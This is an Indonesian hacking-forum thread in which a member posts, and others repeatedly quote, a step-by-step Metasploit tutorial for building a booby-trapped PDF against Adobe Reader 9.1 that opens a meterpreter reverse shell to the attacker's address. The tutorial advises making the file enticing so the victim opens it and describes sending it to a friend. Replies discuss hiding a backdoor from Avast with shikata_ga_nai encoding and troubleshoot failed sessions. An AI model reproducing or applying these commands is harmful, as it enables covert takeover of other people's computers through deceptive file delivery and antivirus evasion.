[Share] Exploit Using Adobe PDF With Metasploit
#21
(06-15-2015, 10:08 AM)kakus130908 Wrote: nice om, ini kasusnya untuk satu jaringan aja ya om?

kalau misalnya kasusnya, ane mau ngasih pdf itu ke temen ane yang berbeda jaringan gimana om ? apakah masih bisa menggunakan ip seperti itu? terima kasih om.

coba dulu saja om waktu itu saya coba dan work om Smile
I'm Not Jomblo | I'm Not Single | I'm Just Linuxer


#22
Quote:iya..dibungkus pake shikata_ga_nai.
pernah coba sama kawan2 Malang.
nyusupin file idm.exe

OS Windows 7 32bit.
Avast yang 2014.

itu backdoor gak kedeteksi sama AV.
tapi belom sempat praktek/ngetest di AV lain. Smile

iya om work kemarin saya coba dan ga tedeteksi sama AV avast 2015 cuma filenya corrupt ga bisa diinstall.
I'm Not Jomblo | I'm Not Single | I'm Just Linuxer


#23
(06-17-2015, 02:44 AM)Creed Wrote: iya om work kemarin saya coba dan ga tedeteksi sama AV avast 2015 cuma filenya corrupt ga bisa diinstall.

Kalo saya praktek kemaren sukses di install,om. Smile







#24
Quote:Kalo saya praktek kemaren sukses di install,om. Smile

gimana om caranya? ane kemarin coba installannya corupt
I'm Not Jomblo | I'm Not Single | I'm Just Linuxer


#25
(05-18-2015, 06:41 AM)Creed Wrote: Oke guys pagi ini saya akan membuat tutorial Exploit Using PDF with Metasploit, berikut bahan-bahan yang diperlukan guys :

[Image: Screenshot_1.png]

Level : Medium, Hard

Testing : Win XP SP3, Windows 7

Vulnerable Application Testing : Adobe Reader 9.1

Requirement :

1. Metasploit Framework

2. Windows or Linux OS(I'm using Kali Linux in this tutorial)


Berikut ini tahap-tahapannya :

Buka terminal anda dan ketikan ini:


Code:
service postgresql start
service metasploit start
msfconsole

[Image: Screenshot_2.png]

setelah terbuka metasploit anda ketikan ini:


Code:
use exploit/windows/fileformat/adobe_pdf_embedded_exe_nojs
set payload windows/meterpreter/reverse_tcp
set filename tugas.pdf
set lhost 192.168.1.100
set lport 443
exploit

Keterangan:
use exploit Use adobe pdf embedded exe exploit
set payload window set the payload to return meterpreter script when exploit successfully performed
set filename tugas.pdf --> Membuat file ini semenarik Anda sehingga korban akan membuka PDF berbahaya Anda.
set lhost 192.168.1.100 --> Ip Anda
set lport 443 --> Saya menggunakan port ini (443 selalu terbuka: p)
exploit --> menghasilkan PDF berbahaya

[Image: Screenshot_3.png]


Setelah berhasil menghasilkan PDF, itu akan disimpan di komputer lokal Anda buka folder home CTRL+H /root/.msf4/local/(nama pdf)
Langkah selanjutnya adalah mengirimkan pdf kita untuk menargetkan ke korban, terserah mau pakai teknik apa jg bro yang penting file pdf sampai dikomputer korban. Dalam hal ini saya akan kirimkan ke teman saya ma*******@gmail.com kebetulan teman ane masih pakai wedus XP.

setelah file kita berada di pc korban tinggal ketikan ini di terminal:


Code:
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lport 443
set lhost 192.168.1.100 (ip anda)
exploit

[Image: Screenshot_4.png]

dan gotcha ane dapet sessionnya setelah teman ane membuka pdfnya Smile

maaf mau tanya ini pake adobe reader versi berapa ya soalnya ane pake adobe reader versi terbaru tidak work

#26
Quote:maaf mau tanya ini pake adobe reader versi berapa ya soalnya ane pake adobe reader versi terbaru tidak work

ini ane coba di adobe versi 9.1 om dan work om.
I'm Not Jomblo | I'm Not Single | I'm Just Linuxer


#27
untuk varian windows 7 atau delapan bisa ngga om dan apakah jenis backdoornya bisa pake selain adobe contoh word atau yang lain dengan extensi file.exe

#28
(05-18-2015, 06:41 AM)Creed Wrote: Oke guys pagi ini saya akan membuat tutorial Exploit Using PDF with Metasploit, berikut bahan-bahan yang diperlukan guys :

[Image: Screenshot_1.png]

Level : Medium, Hard

Testing : Win XP SP3, Windows 7

Vulnerable Application Testing : Adobe Reader 9.1

Requirement :

1. Metasploit Framework

2. Windows or Linux OS(I'm using Kali Linux in this tutorial)


Berikut ini tahap-tahapannya :

Buka terminal anda dan ketikan ini:

Code:
service postgresql start
service metasploit start
msfconsole

[Image: Screenshot_2.png]

setelah terbuka metasploit anda ketikan ini:

Code:
use exploit/windows/fileformat/adobe_pdf_embedded_exe_nojs
set payload windows/meterpreter/reverse_tcp
set filename tugas.pdf
set lhost 192.168.1.100
set lport 443
exploit

Keterangan:
use exploit Use adobe pdf embedded exe exploit
set payload window set the payload to return meterpreter script when exploit successfully performed
set filename tugas.pdf --> Membuat file ini semenarik Anda sehingga korban akan membuka PDF berbahaya Anda.
set lhost 192.168.1.100 --> Ip Anda
set lport 443 --> Saya menggunakan port ini (443 selalu terbuka: p)
exploit --> menghasilkan PDF berbahaya

[Image: Screenshot_3.png]


Setelah berhasil menghasilkan PDF, itu akan disimpan di komputer lokal Anda buka folder home CTRL+H /root/.msf4/local/(nama pdf)
Langkah selanjutnya adalah mengirimkan pdf kita untuk menargetkan ke korban, terserah mau pakai teknik apa jg bro yang penting file pdf sampai dikomputer korban. Dalam hal ini saya akan kirimkan ke teman saya ma*******@gmail.com kebetulan teman ane masih pakai wedus XP.

setelah file kita berada di pc korban tinggal ketikan ini di terminal:

Code:
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lport 443
set lhost 192.168.1.100 (ip anda)
exploit

[Image: Screenshot_4.png]

dan gotcha ane dapet sessionnya setelah teman ane membuka pdfnya Smile

saya uda nyoba langkah2 diatas, tp ketika korban uda ngeksekusi filenya kog metasploitnya nggk ngerespon apa2ya?? mohon bantuannya
[Image: ojda6knid]


msf exploit(handler) > set lhost 192.168.43.
lhost => 192.168.43.
msf exploit(handler) > exploit

[*] Started reverse handler on 192.168.43.
[*] Starting the payload handler...

uda berhenti disitu doang.. padahal file pdf uda di eksekusi

#29
bro ane ko gagal ya pake cara ini, padahal pdf nya udah di buka sama korban dan korban nya pun udah pake adobe reader 9.1 tapi ga sampe meterpreter di msf nya





Users browsing this thread: 2 Guest(s)